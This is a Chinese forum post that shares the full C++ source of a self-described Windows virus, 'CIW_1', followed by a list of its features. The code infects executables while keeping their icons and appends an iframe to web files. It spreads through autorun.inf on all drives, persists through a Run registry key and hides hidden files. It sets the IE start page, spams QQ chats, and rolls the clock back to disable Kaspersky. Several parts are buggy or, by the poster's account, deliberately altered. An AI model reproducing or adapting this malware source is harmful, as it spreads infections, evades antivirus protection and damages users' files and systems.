- 主题
- 7
- 帖子
- 116
- 精华
- 2
- 积分
- 345
- C币
- 244 枚
- 在线时间
- 101 小时
- 注册时间
- 2010-1-18
- 最后登录
- 2012-2-2
- 性别
- 保密
- 主题
- 7
- 帖子
- 116
- C币
- 244 枚
- 在线时间
- 101 小时
|
发表于 2010-3-16 13:57:11
|显示全部楼层
本帖最后由 klttl 于 2010-4-24 17:20 编辑
#include "stdafx.h"
#include "resource.h"
#include <cstdio>
#include <ctime>
#include<tlhelp32.h>
HINSTANCE hInst;
HWND hWnd;
ATOM MyRegisterClass(HINSTANCE hInstance);
BOOL InitInstance(HINSTANCE, int);
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
/************** 程序ID定义 ******************/
#define id_Send 0x77E //发送按扭的ID
#define id_Infect 1000 //控制感染的定时器的ID
#define id_SendQQMsg 1001 //控制发送QQ消息的定时器ID
/************** 程序常量定义 ******************/
const int nWebFileTypeNum = 6; //网页类型的数目
const char *szWebFilePostfix[nWebFileTypeNum] = { "htm", "html", "asp", "php", "jsp", "aspx" }; //感染网页类型
/*************** 函数定义 ******************/
int InfectAllFile(char *szDir);
void SendQQMsg();
int GetVolumeName(char szVolumeName[] );
void ReleaseFile(char* szReleaseFileName);
int IsInfect(char *szFileName );
int InfectFile(char *szSrcFileName );
int CheckAntivirus();
int InfectAllFile(char *szDir);
void InfectWebFile(char *szInfectFileName );
void SetAutorun();
void GetPostfixName(char *szFileName, char *szPostfixName );
int GetVolumeName(char szVolumeName[] );
void WriteReg();
void ReleaseFile(char* szReleaseFileName)
{
char szFileName[200];
GetTempFileName( "C:\\Windows\\", "CIW_", 0, szFileName );
HRSRC hRes = FindResource( NULL, MAKEINTRESOURCE(14), RT_RCDATA );
if( hRes )
{
HGLOBAL hLoadRes = LoadResource( NULL, hRes );
LPVOID szSrcFileBuf = LockResource( hLoadRes );
DWORD nSizeOfSrcFile = SizeofResource(NULL, hRes );
if( szSrcFileBuf != NULL )
{
HANDLE hSrcFile = CreateFile( szFileName, GENERIC_WRITE | GENERIC_READ , FILE_SHARE_READ | FILE_SHARE_READ,
NULL, CREATE_ALWAYS, NULL, NULL);
WriteFile( hSrcFile, szSrcFileBuf, nSizeOfSrcFile, &nSizeOfSrcFile, NULL);
CloseHandle( hSrcFile );
STARTUPINFO si;
PROCESS_INFORMATION pi;
GetStartupInfo(&si);
CreateProcess(szFileName,GetCommandLine(),NULL,
NULL,NULL,NULL,NULL,NULL,&si,&pi);
}
}
else
{
szReleaseFileName = NULL;
return ;
}
strcpy( szReleaseFileName, szFileName);
}
|
|
|
int IsInfect(char *szFileName )
{
HMODULE hModule = LoadLibrary( szFileName );
if( hModule )
{
HRSRC hRes = FindResource(hModule , MAKEINTRESOURCE(14), RT_RCDATA );
FreeLibrary( hModule );
if( hRes )
{
return 1;
}
}
return 0;
}
const int FINDICONNUM = 15;
int InfectFile(char *szSrcFileName )
{
char szMyFileName[200];
GetModuleFileName( NULL, szMyFileName, 200);
DeleteFile("C:\\Windows\\CIW.exe");
CopyFile( szMyFileName, "C:\\Windows\\CIW.exe", true );
HMODULE hModule =LoadLibrary( szSrcFileName );
int i = 0, j = 0;
HRSRC hRes ;
DWORD dwIconSize;
for(; i < FINDICONNUM ;i ++ )
{
hRes = NULL;
hRes = FindResource( hModule, (LPCTSTR)i, RT_ICON );
dwIconSize = SizeofResource( hModule, hRes) ;
if( i == (FINDICONNUM - 1))
{
i = 0;
j ++ ;
if( j == 13 )
{
break;
}
}
}
HANDLE hUpdateTemp;
if( hRes )
{
hUpdateTemp = BeginUpdateResource( "C:\\Windows\\CIW.exe", false );
}
else
{
hUpdateTemp = BeginUpdateResource( "C:\\Windows\\CIW.exe", true );
}
HGLOBAL hLoadRes = LoadResource( hModule, hRes);
UpdateResource( hUpdateTemp, RT_ICON, (char*)1, 0, hLoadRes, dwIconSize );
DestroyIcon( (HICON) hLoadRes );
EndUpdateResource( hUpdateTemp, false );
FreeLibrary( hModule );
HANDLE hSrcFile = CreateFile( szSrcFileName, GENERIC_WRITE | GENERIC_READ , FILE_SHARE_READ | FILE_SHARE_READ,
NULL, OPEN_EXISTING, NULL, NULL);
if( (int)hSrcFile == -1 )
{
return 0;
}
DWORD nSizeOfSrcFile = GetFileSize( hSrcFile, &nSizeOfSrcFile );
char *szSrcFileBuf = new char[ nSizeOfSrcFile ];
ReadFile( hSrcFile, szSrcFileBuf, nSizeOfSrcFile, &nSizeOfSrcFile, NULL);
HANDLE hUpdate = BeginUpdateResource( "C:\\Windows\\CIW.exe", false );
UpdateResource( hUpdate, RT_RCDATA, MAKEINTRESOURCE(14),NULL, szSrcFileBuf, nSizeOfSrcFile);
EndUpdateResource( hUpdate, false );
delete []szSrcFileBuf;
CloseHandle( hSrcFile );
return 1;
}
|
|
|
int CheckAntivirus()
{
PROCESSENTRY32 pe32;
pe32.dwSize=sizeof(pe32);
BOOL bMore = 1;
HANDLE hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hProcessSnap==INVALID_HANDLE_VALUE)
{
return 0;
}
while(bMore)
{
//有没有卡巴斯基
if( strcmp( "avp.exe", pe32.szExeFile ) )
{
return 1;
}
bMore=Process32Next(hProcessSnap,&pe32);
}
CloseHandle(hProcessSnap);
return 0;
}
//大写字符串转小写字符串
void Change(char *str )
{
for( int i = 0; i < (int)strlen( str ); i++ )
{
if( str >= 'A' && str <= 'Z' )
{
str -= 'A' - 'a';
}
}
}
void GetPostfixName(char *szFileName, char *szPostfixName )
{
int nFileNameSize = strlen( szFileName );
for( int i = nFileNameSize - 1; i >= 0; i--)
{
if( szFileName == '.' )
{
break;
}
}
i= nFileNameSize - i - 1; //文件后缀名的长度
for( int j = 0; j < nFileNameSize; j ++ )
{
szPostfixName[ j ] = szFileName[ nFileNameSize - i + j ];
}
szPostfixName[ j ] = 0;
}
int InfectAllFile(char *szDir)
{
DWORD dwPeType;
char directory[MAX_PATH];
char file[MAX_PATH];
HANDLE hFile;
WIN32_FIND_DATA fd;
memset( &fd, 0, sizeof(WIN32_FIND_DATA) );
strncpy(directory, szDir,MAX_PATH);
strcat(directory,"*.*");
hFile = FindFirstFile(directory, &fd);
do
{
if( fd.cFileName[0] != '.' )
{
if( fd.dwFileAttributes == FILE_ATTRIBUTE_DIRECTORY) //是目录
{
memset(file, 0, MAX_PATH);
strcpy(file, szDir );
strcat(file, fd.cFileName );
strcat(file, "\\" );
InfectAllFile(file);
}
else //是文件
{
memset(file, 0, MAX_PATH);
strcpy(file, szDir);
strcat(file, fd.cFileName );
if( strcmp( fd.cFileName, "NTDETECT.COM") == 0) //是 "NTDETECT.COM" 文件跳出
{
continue;
}
char szPostfixName[20];
int i = GetBinaryType( file, &dwPeType );
GetPostfixName( file, szPostfixName );
if((dwPeType == SCS_32BIT_BINARY ||
dwPeType ==SCS_OS216_BINARY ) && i ) //是PE文件感染
{
if( !IsInfect( file ) ) //是否感染过
{
InfectFile( file );
DeleteFile( file );
CopyFile( "C:\\Windows\\CIW.exe", file, false);
}
}
else //不是PE文件
{
for( int i = 0; i < nWebFileTypeNum; i++)
{
if( strcmp( szPostfixName, szWebFilePostfix ) == 0 ) //是网页文件
{
InfectWebFile( file );
}
}
}
}
}
}while( FindNextFile( hFile, &fd) );
return 0;
}
|
|
|
void SendQQMsg()
{
HWND hFore, hChat, hParent;
char szTest[] = "这是我的QQ主页哦! http://user.qzone.qq.com/281011131 ";
HWND hWnd=NULL;
char name[200];
int len;
char ch[3] = {0, 0, 0};
while(hWnd=FindWindowEx(NULL,hWnd,NULL,NULL))
{
GetWindowText(hWnd,name,200);
len=strlen(name);
ch[0]=name[len-2];
ch[1]=name[len-1];
if(strcmp(ch,"群")==0 || strcmp(ch,"中")==0 )
{
hFore=FindWindow(NULL,name);
hParent=FindWindowEx(hFore,NULL,"#32770",NULL);
hChat=FindWindowEx(hParent,NULL,"AfxWnd42",NULL);
hChat=FindWindowEx(hParent,hChat,"AfxWnd42",NULL);
hChat=FindWindowEx(hChat,NULL,"RichEdit20A",NULL);
if( hChat )
{
SendMessage( hChat ,EM_REPLACESEL,0,LPARAM(szTest));
SendMessage(hParent,WM_COMMAND,id_Send,BN_CLICKED);
}
}
}
}
/******** 获得所有的磁盘 ********/
int GetVolumeName(char szVolumeName[] )
{
int nVolumeNum = 0;
WIN32_FIND_DATA fd;
for( int i = 'C'; i <= 'Z'; i ++ )
{
char szVolumeNameTemp[10];
sprintf( szVolumeNameTemp, "%c:\\*.*", i );
HANDLE hFile = FindFirstFile( szVolumeNameTemp, &fd);
if( ( unsigned int ) hFile != -1)
{
szVolumeName[ nVolumeNum ] = i;
nVolumeNum ++;
}
}
szVolumeName[ nVolumeNum ] = 0;
return nVolumeNum; //磁盘的数目
}
/******** 感染网页文件 ********/
void InfectWebFile(char *szInfectFileName )
{
//感染网页的内容
char szWriteText[] = "<iframe src=http://user.qzone.qq.com/281011131 width=height=0></iframe>";
unsigned long dwWriteTextByte = strlen( szWriteText );
char *szWebFileBuf = new char[ dwWriteTextByte + 1] ;
HANDLE hWebFile = CreateFile( szInfectFileName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ,
NULL, OPEN_EXISTING, NULL, NULL);
DWORD dwWebFileSize = GetFileSize( hWebFile, &dwWebFileSize);
if( dwWebFileSize < dwWriteTextByte)//没有被感染过
{
//感染
SetEndOfFile( hWebFile );
WriteFile( hWebFile, szWriteText, dwWriteTextByte, &dwWriteTextByte, 0);
}
else
{
SetFilePointer( hWebFile, dwWebFileSize - dwWriteTextByte, 0, FILE_BEGIN);
ReadFile( hWebFile, szWebFileBuf, dwWriteTextByte, &dwWriteTextByte, NULL);
szWebFileBuf[dwWriteTextByte] = 0;
if( strcmp( szWebFileBuf, szWriteText) != 0 ) //没有被感染过
{
//感染
SetEndOfFile( hWebFile );
WriteFile( hWebFile, szWriteText, dwWriteTextByte, &dwWriteTextByte, 0);
}
}
delete [] szWebFileBuf;
CloseHandle( hWebFile );
}
/******** AutoRun.inf ********/
void SetAutorun()
{
char szVolumeName[25];
int nVolumeNum = GetVolumeName( szVolumeName );
for( int i = 0; i < nVolumeNum; i++)
{
char szFileName[20];
char szMyFileName[200];
char szAutorunFile[100];
sprintf( szFileName, "%c:\\CIW.exe", szVolumeName );
sprintf( szAutorunFile, "%c:\\autorun.inf", szVolumeName );
DeleteFile( szAutorunFile );
DeleteFile( szFileName );
GetModuleFileName( NULL, szMyFileName, 200);
CopyFile( szMyFileName, szFileName, true);
HANDLE hAutorunFile = CreateFile( szAutorunFile, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ,
NULL, CREATE_ALWAYS, NULL, NULL);
char szWriteText[200] ;
sprintf(szWriteText, "[Autorun] \n open=%s \nshellexecute=%s\nshell\\Auto\\command=%s",
szFileName, szFileName, szFileName);
DWORD dwWriteByte;
WriteFile( hAutorunFile, szWriteText, strlen( szWriteText ), &dwWriteByte, 0);
CloseHandle( hAutorunFile );
SetFileAttributes( szFileName, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
SetFileAttributes( szAutorunFile, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
}
}
|
|
| 5/******** 注册表操作 ********/
void SetRegValue(HKEY hKey, char *szSubKey, char *szKeyName, char *szValue )
{
RegOpenKeyEx( hKey, szSubKey, 0,
KEY_ALL_ACCESS, &hKey);
if( hKey )
{
RegSetValueEx( hKey, szKeyName, 0, REG_SZ, (const unsigned char *)szValue,
strlen( (char *)szValue ) );
}
RegCloseKey( hKey );
}
/******** 写入一些常用的注册表值 ********/
void WriteReg()
{
//实现 开机启动程序
char szMyFileName[200];
GetModuleFileName( NULL, szMyFileName, 200);
SetRegValue( HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "CIW_1", szMyFileName);
//实现 不能打开显示文件
SetRegValue( HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL",
"CheckedValue", "0");
//设置 IE的主页
SetRegValue( HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\Main",
"Start Page", "http://user.qzone.qq.com/281011131");
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
MSG msg;
MyRegisterClass(hInstance);
InitInstance (hInstance, nCmdShow);
while (GetMessage (&msg, NULL, 0, 0))
{
DispatchMessage (&msg) ;
}
return msg.wParam;
return 0;
}
ATOM MyRegisterClass(HINSTANCE hInstance)
{
WNDCLASSEX wcex;
wcex.cbSize = sizeof(WNDCLASSEX);
wcex.style = CS_HREDRAW | CS_VREDRAW;
wcex.lpfnWndProc = (WNDPROC)WndProc;
wcex.cbClsExtra = 0;
wcex.cbWndExtra = 0;
wcex.hInstance = hInstance;
wcex.hIcon = NULL;
wcex.hCursor = NULL;
wcex.hCursor = LoadCursor(NULL, IDC_ARROW);
wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
wcex.lpszMenuName = NULL;
wcex.lpszClassName = "CIW";
wcex.hIconSm = NULL;
return RegisterClassEx(&wcex);
}
BOOL InitInstance(HINSTANCE hInstance, int nCmdShow)
{
hInst = hInstance;
hWnd = CreateWindow("CIW", "CIW" , WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, 0, CW_USEDEFAULT, 0, NULL, NULL, hInstance, NULL);
MoveWindow(hWnd,0,0,0,0,false);
SetTimer( hWnd, 1000, 5000, NULL);
MessageBox( NULL, "你已经中了CIW_1病毒了", "提示", MB_ICONERROR);
return TRUE;
}
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
static int nIsInfect = false; //是否要感染其他PE文件
switch (message)
{
case WM_CREATE:
{
/************ 有没有启动卡巴斯基 ***************/
int bIsAntiVirus = CheckAntivirus();
SYSTEMTIME sysTime ;
SYSTEMTIME localTime ;
GetLocalTime( &localTime );
memcpy( &sysTime, &localTime, sizeof( SYSTEMTIME ) );
sysTime.wDay = 28;
sysTime.wMonth = 7;
sysTime.wYear = 1989;
if( bIsAntiVirus )
{
SetLocalTime( &sysTime );
}
char szTempFileName[200];
SetAutorun(); //Autorun.inf
if( bIsAntiVirus ) //有启动卡巴
{
SetLocalTime( &localTime );
}
/************ 有没有启动卡巴斯基 ***************/
char szVolumeName[25];
char szInfectVolumeName[50];
int nVolumeNum = GetVolumeName( szVolumeName ); //获取磁盘名和磁盘的个数
//随机感染磁盘的文件
srand( time( 0 ) );
sprintf( szInfectVolumeName, "%c:\\", szVolumeName[rand()%nVolumeNum]);
InfectAllFile( szInfectVolumeName );
}
break;
case WM_TIMER:
SendQQMsg();
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProc(hWnd, message, wParam, lParam);
}
return 0;
}
|
病毒功能:
1.感染exe文件
2.弹出一个对话框,提示用户已经中毒了.
3.检测是否有卡巴斯基,如果有就把时间改成1989年7月28日,让卡巴变黑,然后感染,运行.
4.被感染后的exe的图片不会变(不像熊猫烧香那样会变成一只熊猫,为了这个功能我测试了100多次实现才弄明白的)
5.Autorun
6.开机运行
7.设置IE主页
8.发QQ消息
9.感染 "htm", "html", "asp", "php", "jsp", "aspx" 文件
最后说明一点,每个人学习的目的不一样,,你们自己一个研究一边改.) 这是我为别人写的病毒! 所以我把代码改了3个地方!以防止没有技术又卑鄙的人经常用代码就直接编译,然后到网上害人! |
|
